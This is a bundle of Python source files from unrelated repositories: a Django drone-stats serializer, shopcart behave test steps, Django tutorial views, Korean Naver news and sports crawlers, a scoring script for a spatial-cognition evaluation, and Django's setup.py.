#### File: drone-wrapper/stats/serializers.py ```python from rest_framework import serializers from .models import Flight, Deck, Drone, FlightRecord class DeckSerializer(serializers.ModelSerializer): def create(self, validated_data): return Deck.objects.create(**validated_data) class Meta: model = Deck fields = '__all__' class FlightRecordSerializer(serializers.ModelSerializer): def create(self, validated_data): return FlightRecord.objects.create(**validated_data) class Meta: model = FlightRecord fields = '__all__' class FlightSerializer(serializers.ModelSerializer): def create(self, validated_data): flight = Flight.objects.create(**validated_data) Drone.objects.update(flight=flight.id) return flight class Meta: model = Flight fields = '__all__' class DroneSerializer(serializers.ModelSerializer): class Meta: model = Drone fields = '__all__' def create(self, validated_data): drone_alias = validated_data['drone_alias'].lower() deck_name = "".join([drone_alias, '-deck']) Deck.objects.create(deck_name=deck_name, is_occupied=False) validated_data['deck'] = Deck.objects.get(deck_name=deck_name) validated_data['admin'] = self.context['request'].user drone = Drone.objects.create(**validated_data) return drone ```
{ "source": "2022-Spring-NYU-DevOps-Shopcarts/shopcarts", "score": 3 }
#### File: features/steps/shopcarts_steps.py ```python import json import requests from behave import given from compare import expect @given('a set of items in shopcarts') def step_impl(context): """ Delete all Shopcarts and load new ones """ headers = {'Content-Type': 'application/json'} # list all of the shopcarts and delete them one by one context.resp = requests.get(context.base_url + '/shopcarts') expect(context.resp.status_code).to_equal(200) for shopcart in context.resp.json(): context.resp = requests.delete(context.base_url + '/shopcarts/' + str(shopcart["user_id"]), headers=headers) expect(context.resp.status_code).to_equal(204) # load the database with new shopcarts create_url = context.base_url + '/shopcarts' for row in context.table: data = { "item_id": int(row['item_id']), "item_name": row['item_name'], "quantity": int(row['quantity']), "price": float(row['price']), "hold": bool(row['hold'] in ['True', 'true', '1']) } payload = json.dumps(data) context.resp = requests.post(create_url+"/"+row['user_id']+"/items", data=payload, headers=headers) expect(context.resp.status_code).to_equal(201) ```
{ "source": "2027205T/tangowithdjango", "score": 2 }
#### File: tango_with_django_project/rango/views.py ```python from django.shortcuts import render from rango.models import Category from rango.models import Page from rango.models import User from rango.forms import CategoryForm from rango.forms import PageForm from rango.forms import UserForm, UserProfileForm from django.contrib.auth import authenticate, login from django.http import HttpResponseRedirect, HttpResponse from django.contrib.auth.decorators import login_required from django.contrib.auth import logout from datetime import datetime from rango.bing_search import run_query from django.shortcuts import redirect @login_required def restricted(request): # Take the user back to the homepage. return HttpResponseRedirect('/rango/restricted.html') def manageCookies(request, context_dict): visits = request.session.get('visits') if not visits: visits = 1 reset_last_visit_time = False last_visit = request.session.get('last_visit') if last_visit: last_visit_time = datetime.strptime(last_visit[:-7], "%Y-%m-%d %H:%M:%S") if (datetime.now() - last_visit_time).seconds > 0: # ...reassign the value of the cookie to +1 of what it was before... visits = visits + 1 # ...and update the last visit cookie, too. reset_last_visit_time = True else: # Cookie last_visit doesn't exist, so create it to the current date/time. reset_last_visit_time = True if reset_last_visit_time: request.session['last_visit'] = str(datetime.now()) request.session['visits'] = visits context_dict['visits'] = visits return context_dict def index(request): category_list = Category.objects.order_by('-likes')[:5] page_list = Page.objects.order_by('-views')[:5] context_dict = {'categories': category_list, 'pages': page_list} context_dict = manageCookies(request, context_dict) response = render(request,'rango/index.html', context_dict) return response def about(request): # Construct a dictionary to pass to the template engine as its context. # Note the key boldmessage is the same as {{ boldmessage }} in the template! context_dict = {'boldmessage': "sorry :)"} # If the visits session varible exists, take it and use it. # If it doesn't, we haven't visited the site so set the count to zero. if request.session.get('visits'): context_dict['visits'] = request.session.get('visits') else: context_dict['visits'] = 0 # Return a rendered response to send to the client. # We make use of the shortcut function to make our lives easier. # Note that the first parameter is the template we wish to use. return render(request, 'rango/about/index.html', context_dict) def category(request, category_name_slug): context_dict = {} context_dict['result_list'] = None context_dict['query'] = None if request.method == 'POST': query = request.POST.get('query', '').strip() if query: # Run our Bing function to get the results list! result_list = run_query(query) context_dict['result_list'] = result_list context_dict['query'] = query try: category = Category.objects.get(slug=category_name_slug) context_dict['category_name'] = category.name pages = Page.objects.filter(category=category).order_by('-views') context_dict['pages'] = pages context_dict['category'] = category except Category.DoesNotExist: pass if not context_dict['query']: context_dict['query'] = category.name return render(request, 'rango/category.html', context_dict) @login_required def add_category(request): # A HTTP POST? if request.method == 'POST': form = CategoryForm(request.POST) # Have we been provided with a valid form? if form.is_valid(): # Save the new category to the database. form.save(commit=True) # Now call the index() view. # The user will be shown the homepage. return index(request) else: # The supplied form contained errors - just print them to the terminal. print form.errors else: # If the request was not a POST, display the form to enter details. form = CategoryForm() # Bad form (or form details), no form supplied... # Render the form with error messages (if any). return render(request, 'rango/add_category.html', {'form': form}) @login_required def add_page(request, category_name_slug): try: cat = Category.objects.get(slug=category_name_slug) except Category.DoesNotExist: cat = None if request.method == 'POST': form = PageForm(request.POST) if form.is_valid(): if cat: page = form.save(commit=False) page.category = cat page.views = 0 page.save() # probably better to use a redirect here. return category(request, category_name_slug) else: print form.errors else: form = PageForm() context_dict = {'form':form, 'category': cat} return render(request, 'rango/add_page.html', context_dict) ''' def register(request): # A boolean value for telling the template whether the registration was successful. # Set to False initially. Code changes value to True when registration succeeds. registered = False # If it's a HTTP POST, we're interested in processing form data. if request.method == 'POST': # Attempt to grab information from the raw form information. # Note that we make use of both UserForm and UserProfileForm. user_form = UserForm(data=request.POST) profile_form = UserProfileForm(data=request.POST) # If the two forms are valid... if user_form.is_valid() and profile_form.is_valid(): # Save the user's form data to the database. user = user_form.save() # Now we hash the password with the set_password method. # Once hashed, we can update the user object. user.set_password(user.password) user.save() # Now sort out the UserProfile instance. # Since we need to set the user attribute ourselves, we set commit=False. # This delays saving the model until we're ready to avoid integrity problems. profile = profile_form.save(commit=False) profile.user = user # Did the user provide a profile picture? # If so, we need to get it from the input form and put it in the UserProfile model. if 'picture' in request.FILES: profile.picture = request.FILES['picture'] # Now we save the UserProfile model instance. profile.save() # Update our variable to tell the template registration was successful. registered = True # Invalid form or forms - mistakes or something else? # Print problems to the terminal. # They'll also be shown to the user. else: print user_form.errors, profile_form.errors # Not a HTTP POST, so we render our form using two ModelForm instances. # These forms will be blank, ready for user input. else: user_form = UserForm() profile_form = UserProfileForm() # Render the template depending on the context. return render(request, 'rango/register.html', {'user_form': user_form, 'profile_form': profile_form, 'registered': registered} ) def user_login(request): # If the request is a HTTP POST, try to pull out the relevant information. if request.method == 'POST': # Gather the username and password provided by the user. # This information is obtained from the login form. username = request.POST['username'] password = request.POST['password'] # Use Django's machinery to attempt to see if the username/password # combination is valid - a User object is returned if it is. user = authenticate(username=username, password=password) # If we have a User object, the details are correct. # If None (Python's way of representing the absence of a value), no user # with matching credentials was found. if user: # Is the account active? It could have been disabled. if user.is_active: # If the account is valid and active, we can log the user in. # We'll send the user back to the homepage. login(request, user) return HttpResponseRedirect('/rango/') else: # An inactive account was used - no logging in! return HttpResponse("Your Rango account is disabled.") else: # Bad login details were provided. So we can't log the user in. print "Invalid login details: {0}, {1}".format(username, password) return HttpResponse("Hey <strong>{0}</strong>, your login details are invalid.<ul><li><a href='../../rango/login/'>Please try again</a>.</li></ul>".format(username)) # The request is not a HTTP POST, so display the login form. # This scenario would most likely be a HTTP GET. else: # No context variables to pass to the template system, hence the # blank dictionary object... return render(request, 'rango/login.html', {}) # Use the login_required() decorator to ensure only those logged in can access the view. @login_required def user_logout(request): # Since we know the user is logged in, we can now just log them out. logout(request) # Take the user back to the homepage. return HttpResponseRedirect('/rango/') ''' def restricted(request): # Construct a dictionary to pass to the template engine as its context. # Note the key boldmessage is the same as {{ boldmessage }} in the template! context_dict = {'boldmessage': "Oops :)"} # Return a rendered response to send to the client. # We make use of the shortcut function to make our lives easier. # Note that the first parameter is the template we wish to use. return render(request, 'rango/restricted.html', context_dict) def search(request): result_list = [] if request.method == 'POST': query = request.POST['query'].strip() if query: # Run our Bing function to get the results list! result_list = run_query(query) return render(request, 'rango/search.html', {'result_list': result_list}) def track_url(request): page_id = None url = '/rango/' if request.method == 'GET': if 'page_id' in request.GET: page_id = request.GET['page_id'] try: page = Page.objects.get(id=page_id) page.views = page.views + 1 page.save() url = page.url except: pass return redirect(url) @login_required def register_profile(request): if request.method == 'POST': profile_form = UserProfileForm(data=request.POST) if profile_form.is_valid(): profile = profile_form.save(commit=False) profile.user = User.objects.get(id=request.user.id) if 'picture' in request.FILES: try: profile.picture = request.FILES['picture'] except: pass profile.save() return redirect('index') else: profile_form = UserProfileForm() return render(request, 'registration/profile_registration.html', {'profile_form': profile_form}) @login_required def profile(request, user_id = None): if user_id is not None: context_dict = {'user': User.objects.get(id=user_id)} else: context_dict = {'user': User.objects.get(id=request.user.id)} try: context_dict['profile'] = UserProfile.objects.get(user=context_dict['user']) except: context_dict['profile'] = None context_dict['myprofile'] = user_id is None or user_id == request.user.id return render(request, 'registration/profile.html', context_dict) @login_required def edit_profile(request): try: users_profile = UserProfile.objects.get(user=request.user) except: users_profile = None if request.method == 'POST': profile_form = UserProfileForm(data=request.POST, instance=users_profile) if profile_form.is_valid(): profile_updated = profile_form.save(commit=False) if users_profile is None: profile_updated.user = User.objects.get(id=request.user.id) if 'picture' in request.FILES: try: profile_updated.picture = request.FILES['picture'] except: pass profile_updated.save() return redirect('profile') else: form = UserProfileForm(instance=users_profile) return render(request, 'registration/profile_edit.html', {'profile_form': form}) @login_required def user_list(request): users = User.objects.all() return render(request, 'registration/user_list.html', {'users': users}) def bad_url(request): return render(request, 'rango/nopage.html') ```
{ "source": "20-2-SKKU-OSS/2020-2-OSS-6-Project", "score": 3 }
#### File: 2020-2-OSS-6-Project/korea_news_crawler/articlecrawler.py ```python from time import sleep from bs4 import BeautifulSoup from multiprocessing import Process from korea_news_crawler.exceptions import * from korea_news_crawler.articleparser import ArticleParser from korea_news_crawler.writer import Writer import os import platform import calendar import requests import re from newspaper import Article class ArticleCrawler(object): def __init__(self): choosen_categories = self.get_catergory() self.categories = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103, '세계': 104, 'IT과학': 105, '오피니언': 110, 'politics': 100, 'economy': 101, 'society': 102, 'living_culture': 103, 'world': 104, 'IT_science': 105, 'opinion': 110} self.selected_categories = [] self.date = {'start_year': 0, 'start_month': 0, 'end_year': 0, 'end_month': 0} self.get_date() self.set_date_range(self.date['start_year'],self.date['start_month'],self.date['end_year'],self.date['end_month']) self.user_operating_system = str(platform.system()) self.set_category(choosen_categories) self.keyword = self.get_keyword() def get_catergory(self): print("카테고리 : 정치 , 경제 , 사회 , 생활문화 , 세계 , IT과학 , 오피니언, 연합뉴스속보") print("원하는 카테고리를 입력 하세요(공백으로 구분) : ",end ='') choosen_categories = input() choosen_list = choosen_categories.split(' ') print(choosen_list) return choosen_list def get_date(self): print("크롤링을 원하는 날짜 기간을 입력하세요 ") for keys in self.date.keys() : print(keys + " : ",end= '') get_date = int(input()) self.date[keys] = get_date ########################################################## def get_keyword(self): keyword = 'initvalue' ynkeyword = input("기사 제목 키워드 찾기 기능을 사용하시겠습니까? (y/n) :") if ynkeyword == "n" or ynkeyword == "N": return keyword elif ynkeyword == "y" or ynkeyword == "Y": keyword = input("원하는 키워드를 입력해주세요 :") return keyword else: print("invalid input") return keyword ########################################################## def set_category(self, args): for key in args: if self.categories.get(key) is None and key != '연합뉴스속보': raise InvalidCategory(key) self.selected_categories = args def set_date_range(self, start_year, start_month, end_year, end_month): args = [start_year, start_month, end_year, end_month] if start_year > end_year: raise InvalidYear(start_year, end_year) if start_month < 1 or start_month > 12: raise InvalidMonth(start_month) if end_month < 1 or end_month > 12: raise InvalidMonth(end_month) if start_year == end_year and start_month > end_month: raise OverbalanceMonth(start_month, end_month) for key, date in zip(self.date, args): self.date[key] = date print(self.date) @staticmethod def make_news_page_url(category_url, start_year, end_year, start_month, end_month): made_urls = [] for year in range(start_year, end_year + 1): print(year) if start_year == end_year: year_startmonth = start_month year_endmonth = end_month else: if year == start_year: year_startmonth = start_month year_endmonth = 12 elif year == end_year: year_startmonth = 1 year_endmonth = end_month else: year_startmonth = 1 year_endmonth = 12 for month in range(year_startmonth, year_endmonth + 1): for month_day in range(1, calendar.monthrange(year, month)[1] + 1): if len(str(month)) == 1: month = "0" + str(month) if len(str(month_day)) == 1: month_day = "0" + str(month_day) # 날짜별로 Page Url 생성 url = category_url + str(year) + str(month) + str(month_day) # totalpage는 네이버 페이지 구조를 이용해서 page=10000으로 지정해 totalpage를 알아냄 # page=10000을 입력할 경우 페이지가 존재하지 않기 때문에 page=totalpage로 이동 됨 (Redirect) totalpage = ArticleParser.find_news_totalpage(url + "&page=10000") for page in range(1, totalpage + 1): made_urls.append(url + "&page=" + str(page)) return made_urls @staticmethod def get_url_data(url, max_tries=10): remaining_tries = int(max_tries) while remaining_tries > 0: try: headers1 = {'User-Agent':'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} return requests.get(url, headers=headers1) except requests.exceptions: sleep(60) remaining_tries = remaining_tries - 1 raise ResponseTimeout() def crawling(self, category_name): # Multi Process PID print(category_name + " PID: " + str(os.getpid())) writer = Writer(category_name=category_name, date=self.date) # 기사 URL 형식 if (category_name == "연합뉴스속보"): url = "http://news.naver.com/main/list.nhn?mode=LPOD&mid=sec&sid1=001&sid2=140&oid=001&isYeonhapFlash=Y" \ + "&date=" else: url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str( self.categories.get(category_name)) + "&date=" # start_year년 start_month월 ~ end_year의 end_month 날짜까지 기사를 수집합니다. day_urls = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'], self.date['start_month'], self.date['end_month']) print(category_name + " Urls are generated") print("The crawler starts") for URL in day_urls: print(URL) regex = re.compile("date=(\d+)") news_date = regex.findall(URL)[0] request = self.get_url_data(URL) document = BeautifulSoup(request.content, 'html.parser') # html - newsflash_body - type06_headline, type06 # 각 페이지에 있는 기사들 가져오기 if (category_name == "연합뉴스속보"): post_temp = document.select('.newsflash_body .type02 li ') else: post_temp = document.select('.newsflash_body .type06_headline li dl') post_temp.extend(document.select('.newsflash_body .type06 li dl')) # 각 페이지에 있는 기사들의 url 저장 post = [] headlines = [] companys = [] for line in post_temp: post.append(line.a.get('href')) # 해당되는 page에서 모든 기사들의 URL을 post 리스트에 넣음 try: companys.append(line.find('span', class_="writing").text) except: companys.append("err") try: h = line.find_all('a') if len(h) > 1: headlines.append(h[1].text) elif len(h) == 1: headlines.append(h[0].text) else: headlines.append("err") except: headlines.append("err") del post_temp print(len(post)) for i in range(len(post)): # 기사 URL # 크롤링 대기 시간 print(i) sleep(0.01) content_url = post[i] # 기사 HTML 가져옴 try: article = Article(content_url, language='ko') article.download() article.parse() text_sentence = article.text.strip() text_company = companys[i] text_headline = headlines[i].strip() ###################################################################### if self.keyword == 'initvalue': wcsv = writer.get_writer_csv() wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url]) else: headline_to_words = text_headline.split() if headline_to_words.index(self.keyword) >= 0: wcsv = writer.get_writer_csv() wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url]) ###################################################################### except Exception as err: print(err) writer.close() return def start(self, isMultiProc): # MultiProcess 크롤링 시작 for category_name in self.selected_categories: if isMultiProc: proc = Process(target=self.crawling, args=(category_name,)) proc.start() else: self.crawling(category_name) if __name__ == "__main__": Crawler = ArticleCrawler() #Crawler.set_category("생활문화", "IT과학") #Crawler.set_date_range(2017, 1, 2018, 4) Crawler.start() ```
{ "source": "20-2-SKKU-OSS/2020-OSS-2-11", "score": 3 }
#### File: 2020-OSS-2-11/_KoreaNewsCrawler/sportcrawler.py ```python from bs4 import BeautifulSoup from time import sleep import calendar import csv import requests import re import json from exceptions import * from multiprocessing import Process class SportCrawler: def __init__(self): self.category = {'한국야구': "kbaseball",'해외야구': "wbaseball",'해외축구' : "wfootball", '한국축구': "kfootball", '농구': "basketball", '배구': "volleyball", '일반 스포츠': "general", 'e스포츠': "esports"} self.selected_category = [] self.selected_urlcategory=[] self.date = {'startyear': 0,'startmonth':0, 'endyear': 0, 'endmonth': 0} def javascript_totalpage(self, url): totalpage_url = url +"&page=10000" request_content = requests.get(totalpage_url,headers={'User-Agent':'Mozilla/5.0'}) pagenumber = re.findall('\"totalPages\":(.*)}',request_content.text) return int(pagenumber[0]) def content(self, html_document, url_label): label = url_label content_match = [] Tag = html_document.find_all('script', {'type': 'text/javascript'}) Tag_ = re.sub(',"officeName', '\nofficeName', str(Tag)) regex = re.compile('oid":"(?P<oid>\d+)","aid":"(?P<aid>\d+)"') content = regex.findall(Tag_) for oid_aid in content: maked_url = "https://sports.news.naver.com/" + label + "/news/read.nhn?oid=" + oid_aid[0] + "&aid=" + \ oid_aid[1] content_match.append(maked_url) return content_match def Clearcontent(self, text): remove_special = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text) remove_author = re.sub('\w\w\w 기자', '', remove_special) remove_flasherror = re.sub( '본문 내용|TV플레이어| 동영상 뉴스|flash 오류를 우회하기 위한 함수 추가fuctio flashremoveCallback|tt|t|앵커 멘트|xa0', '', remove_author) remove_strip = remove_flasherror.strip().replace(' ', '') # 공백 에러 삭제 reverse_content = ''.join(reversed(remove_strip)) # 기사 내용을 reverse 한다. cleared_content = '' for i in range(0, len(remove_strip)): if reverse_content[ i:i + 2] == '.다': # 기사가 reverse 되었기에 ".다"로 기사가 마무리 되므로, 이를 탐색하여 불필요한 정보를 모두 지운다. cleared_content = ''.join(reversed(reverse_content[i:])) break cleared_content=re.sub('if deployPhase(.*)displayRMCPlayer ','',cleared_content) return cleared_content def Clearheadline(self, text): first = re.sub('[\{\}\[\]\/?,;:|\)*~`!^\-_+<>@\#$%&n▲▶◆◀■\\\=\(\'\"]', '', text) return first def Make_url(self, URL, startyear, lastyear, startmonth, lastmonth): Maked_url = [] final_startmonth = startmonth final_lastmonth = lastmonth for year in range(startyear, lastyear + 1): if year != lastyear: startmonth = 1 lastmonth = 12 else: startmonth = final_startmonth lastmonth = final_lastmonth for Month in range(startmonth, lastmonth + 1): for Month_Day in range(1, calendar.monthrange(year, Month)[1] + 1): url = URL if len(str(Month)) == 1: Month = "0" + str(Month) if len(str(Month_Day)) == 1: Month_Day = "0" + str(Month_Day) url = url + str(year) + str(Month) + str(Month_Day) final_url = url # page 날짜 정보만 있고 page 정보가 없는 url 임시 저장 totalpage = self.javascript_totalpage(url) # TotalPage 확인 for page in range(1, totalpage + 1): url = final_url # url page 초기화 url = url + "&page=" + str(page) Maked_url.append(url) # [[page1,page2,page3 ....] return Maked_url def crawling(self, category_name): Url_category = [] Category = [] Category.append(category_name) Url_category.append(self.category[category_name]) titlescript = [] officename_script = [] completed_content_match = [] timescript=[] for url_label in Url_category: # URL 카테고리. Multiprocessing시 어차피 1번 도는거라 refactoring할 필요 있어보임 category = Category[Url_category.index(url_label)] # URL 인덱스와 Category 인덱스가 일치할 경우 그 값도 일치 url = "https://sports.news.naver.com/" + url_label + "/news/list.nhn?isphoto=N&view=photo&date=" final_urlday = self.Make_url(url,self.date['startyear'], self.date['endyear'], self.date['startmonth'], self.date['endmonth']) print("succeed making url") if len(str(self.date['startmonth'])) == 2: startmonth=str(self.date['startmonth']) else: startmonth='0'+str(self.date['startmonth']) if len(str(self.date['endmonth']))==2: endmonth=str(self.date['endmonth']) else: endmonth='0'+str(self.date['endmonth']) file = open("Sport_" + category + "_"+str(self.date['startyear'])+str(startmonth) +"_"+str(self.date['endyear'])+str(endmonth)+".csv", 'w', encoding='euc-kr', newline='') wcsv = csv.writer(file) hefscript2=[] for list_page in final_urlday: # Category Year Month Data Page 처리 된 URL # 제목 / URL request_content = requests.get(list_page, headers={'User-Agent': 'Mozilla/5.0'}) content_dict = json.loads(request_content.text) hefscript = [] for contents in content_dict["list"]: oid = contents['oid'] aid = contents['aid'] titlescript.append(contents['title']) timescript.append(contents['datetime']) hefscript.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid) hefscript2.append("https://sports.news.naver.com/news.nhn?oid=" + oid + "&aid=" + aid) officename_script.append(contents['officeName']) # 본문 # content page 기반하여 본문을 하면 된다. text_sentence에 본문을 넣고 Clearcontent진행 후 completed_conten_match에 append해주면 된다. # 추가적으로 pass_match에 언론사를 집어넣으면 된다. for content_page in hefscript: sleep(0.01) content_request_content = requests.get(content_page, headers={'User-Agent': 'Mozilla/5.0'}) content_document_content = BeautifulSoup(content_request_content.content, 'html.parser') content_Tag_content = content_document_content.find_all('div', {'class': 'news_end'}, {'id': 'newsEndContents'}) text_sentence = '' # 뉴스 기사 본문 내용 초기화 try: text_sentence = text_sentence + str(content_Tag_content[0].find_all(text=True)) completed_content_match.append(self.Clearcontent(text_sentence)) except: pass # Csv 작성 for csvtimeline, csvheadline, csvcontent, csvpress, csvurl in zip(timescript,titlescript, completed_content_match, officename_script,hefscript2): try: if not csvtimeline: continue if not csvheadline: continue if not csvcontent: continue if not csvpress: continue wcsv.writerow([csvtimeline, self.Clearheadline(csvheadline), csvcontent, csvpress, category,csvurl]) except: pass file.close() def set_category(self, *args): for key in args: if self.category.get(key) is None: raise InvalidCategory(key) self.selected_category = args for selected in self.selected_category: self.selected_urlcategory.append(self.category[selected]) def start(self): # MultiProcess 크롤링 시작 for category_name in self.selected_category: proc = Process(target=self.crawling, args=(category_name,)) proc.start() def set_date_range(self,a,b,c,d): self.date['startyear'] = a self.date['startmonth'] = b self.date['endyear'] = c self.date['endmonth'] = d # Main if __name__ == "__main__": Spt_crawler = SportCrawler() Spt_crawler.set_category('한국야구','한국축구') Spt_crawler.set_date_range(2017,4,2018,1) Spt_crawler.start() ```
{ "source": "2030NLP/SpatialCognEval2021", "score": 3 }
#### File: SpatialCognEval2021/ref/evaluate.py ```python import json def formatter(_data, _meta): """ 将数据转换成用于提交和评分的格式。 :param _data: 参考数据集中 [x]-[set]-with-answer.json 文件的格式, 用参赛系统给 [x]-[dev/test].json 中读出的对象列表添加 judge1 或/和 judge2 字段, 然后直接将添加了答案字段的三个任务dev集(或test集)中的所有数据全都放在一个 List 里,构成此参数。 :param _meta: 参赛队伍的关键信息,用来呈现在排行榜。 :return: 符合用于提交和评分的格式的数据,称之为"答卷"。 """ _sheet = {'meta': { 'team_name': _meta['team_name'], # 队伍名称 'institution': _meta['institution'], # 机构(简称) 'email': _meta['email'], # 联系邮箱 }} _methods = { '1': lambda _item: int(_item['judge1']), '2': lambda _item: int(_item['judge2']), '3': lambda _item: [int(_item['judge1']), int(_item['judge2'])], } for _item in _data: _task_id, _set_type, _item_id = _item['qID'].split('-') _key = f"subtask{_task_id}-{_set_type}" if (_set_type == 'dev' or _set_type == 'val' or _set_type == 'test') and _key not in _sheet: _sheet[_key] = {} _sheet[_key][_item_id] = _methods[_task_id](_item) # print(_sheet) # print(json.dumps(_sheet, ensure_ascii=False)) return json.dumps(_sheet) def subtask1_eval(_answers, _ref): """ 子任务1的评分函数。 :param _answers: 答卷答案。 :param _ref: 参考答案。 :return: 统计数据对象。 """ _map = { '11': 'TP', '00': 'TN', '10': 'FN', '01': 'FP', } _st = { 'TP': 0, 'TN': 0, 'FN': 0, 'FP': 0, } for _k, _v in _ref.items(): _ga = int(_v) _aa = int(_answers[_k]) if _k in _answers else 0 _st[_map[f"{_ga}{_aa}"]] += 1 _st['Accuracy'] = (_st['TP'] + _st['TN']) / (_st['TP'] + _st['FP'] + _st['FN'] + _st['TN']) return _st def subtask2_eval(_answers, _ref): """ 子任务2的评分函数,与子任务1算法一致。 :param _answers: 答卷答案。 :param _ref: 参考答案。 :return: 统计数据对象。 """ return subtask1_eval(_answers, _ref) def subtask3_eval(_answers, _ref): """ 子任务3的评分函数。 :param _answers: 答卷答案。 :param _ref: 参考答案。 :return: 统计数据对象。 """ _map_1 = { '11': 'TP_1', '00': 'TN_1', '10': 'FN_1', '01': 'FP_1', } _map_2 = { '11': 'TP_2', '00': 'TN_2', # '10': 'FN_2', # '01': 'FP_2', } _st = { 'TP_1': 0, 'TN_1': 0, 'FN_1': 0, 'FP_1': 0, 'TP_2': 0, 'TN_2': 0, # 'FN_2': 0, # 'FP_2': 0, } for _k, _v in _ref.items(): _ga = int(_v[0]) _aa = int(_answers[_k][0]) if _k in _answers else 0 _st[_map_1[f"{_ga}{_aa}"]] += 1 _gb = int(_v[1]) _ab = int(_answers[_k][1]) if _k in _answers else 0 if _aa == 0 == _ga and _gb == _ab: _st[_map_2[f"{_gb}{_ab}"]] += 1 _st['Precision'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FN_1']) \ if (_st['TN_1'] + _st['FN_1']) != 0 else 0 _st['Recall'] = (_st['TP_2'] + _st['TN_2']) / (_st['TN_1'] + _st['FP_1']) \ if (_st['TN_1'] + _st['FP_1']) != 0 else 0 _st['F1'] = 2 * _st['Precision'] * _st['Recall'] / (_st['Precision'] + _st['Recall']) \ if (_st['Precision'] + _st['Recall']) != 0 else 0 return _st def evaluate(_sheet, _ref1, _ref2, _ref3): _result = { 'meta': _sheet['meta'], 'subtask1': subtask1_eval(_sheet['subtask1-dev'], _ref1), 'subtask2': subtask2_eval(_sheet['subtask2-dev'], _ref2), 'subtask3': subtask3_eval(_sheet['subtask3-dev'], _ref3), } return _result if __name__ == '__main__': # dev_or_test = 'dev' # or 'test' meta = { 'team_name': "某某队", # 队伍名称 'institution': "某某大学", # 机构(简称) 'email': "<EMAIL>", # 联系邮箱 } # my_path_1 = f'/YOUR/PATH/OF/task1-{dev_or_test}-with-answer.json' my_path_2 = f'/YOUR/PATH/OF/task2-{dev_or_test}-with-answer.json' my_path_3 = f'/YOUR/PATH/OF/task3-{dev_or_test}-with-answer.json' answers = [] for path in [my_path_1, my_path_2, my_path_3]: with open(path, 'r', encoding='utf-8') as f: task_answers = json.loads(f.read()) answers += task_answers sheet = json.loads(formatter(answers, meta)) # ref_path_1 = f'/PATH/OF/task1-{dev_or_test}-with-answer.json' ref_path_2 = f'/PATH/OF/task2-{dev_or_test}-with-answer.json' ref_path_3 = f'/PATH/OF/task3-{dev_or_test}-with-answer.json' answers = [] for path in [ref_path_1, ref_path_2, ref_path_3]: with open(path, 'r', encoding='utf-8') as f: task_answers = json.loads(f.read()) answers += task_answers refs = json.loads(formatter(answers, meta)) # that = evaluate(sheet, refs[f'subtask1-{dev_or_test}'], refs[f'subtask2-{dev_or_test}'], refs[f'subtask3-{dev_or_test}']) print(that) pass ```
{ "source": "2032341565/django", "score": 2 }
#### File: 2032341565/django/setup.py ```python import os import sys from distutils.sysconfig import get_python_lib from setuptools import find_packages, setup CURRENT_PYTHON = sys.version_info[:2] REQUIRED_PYTHON = (3, 6) # This check and everything above must remain compatible with Python 2.7. if CURRENT_PYTHON < REQUIRED_PYTHON: sys.stderr.write(""" ========================== Unsupported Python versionpyt ========================== This version of Django requires Python {}.{}, but you're trying to install it on Python {}.{}. This may be because you are using a version of pip that doesn't understand the python_requires classifier. Make sure you have pip >= 9.0 and setuptools >= 24.2, then try again: $ python -m pip install --upgrade pip setuptools $ python -m pip install django This will install the latest version of Django which works on your version of Python. If you can't upgrade your pip (or Python), request an older version of Django: $ python -m pip install "django<2" """.format(*(REQUIRED_PYTHON + CURRENT_PYTHON))) sys.exit(1) # Warn if we are installing over top of an existing installation. This can # cause issues where files that were deleted from a more recent Django are # still present in site-packages. See #18115. overlay_warning = False if "install" in sys.argv: lib_paths = [get_python_lib()] if lib_paths[0].startswith("/usr/lib/"): # We have to try also with an explicit prefix of /usr/local in order to # catch Debian's custom user site-packages directory. lib_paths.append(get_python_lib(prefix="/usr/local")) for lib_path in lib_paths: existing_path = os.path.abspath(os.path.join(lib_path, "django")) if os.path.exists(existing_path): # We note the need for the warning here, but present it after the # command is run, so it's more likely to be seen. overlay_warning = True break EXCLUDE_FROM_PACKAGES = ['django.conf.project_template', 'django.conf.app_template', 'django.bin'] # Dynamically calculate the version based on django.VERSION. version = __import__('django').get_version() def read(fname): with open(os.path.join(os.path.dirname(__file__), fname)) as f: return f.read() setup( name='Django', version=version, python_requires='>={}.{}'.format(*REQUIRED_PYTHON), url='https://www.djangoproject.com/', author='Django Software Foundation', author_email='<EMAIL>', description=('A high-level Python Web framework that encourages ' 'rapid development and clean, pragmatic design.'), long_description=read('README.rst'), license='BSD', packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES), include_package_data=True, scripts=['django/bin/django-admin.py'], entry_points={'console_scripts': [ 'django-admin = django.core.management:execute_from_command_line', ]}, install_requires=['pytz', 'sqlparse'], extras_require={ "bcrypt": ["bcrypt"], "argon2": ["argon2-cffi >= 16.1.0"], }, zip_safe=False, classifiers=[ 'Development Status :: 2 - Pre-Alpha', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3 :: Only', 'Topic :: Internet :: WWW/HTTP', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Internet :: WWW/HTTP :: WSGI', 'Topic :: Software Development :: Libraries :: Application Frameworks', 'Topic :: Software Development :: Libraries :: Python Modules', ], project_urls={ 'Documentation': 'https://docs.djangoproject.com/', 'Funding': 'https://www.djangoproject.com/fundraising/', 'Source': 'https://github.com/django/django', 'Tracker': 'https://code.djangoproject.com/', }, ) if overlay_warning: sys.stderr.write(""" ======== WARNING! ======== You have just installed Django over top of an existing installation, without removing it first. Because of this, your install may now include extraneous files from a previous version that have since been removed from Django. This is known to cause a variety of problems. You should manually remove the %(existing_path)s directory and re-install Django. """ % {"existing_path": existing_path}) ```
{ "source": "20326/packme", "score": 3 }
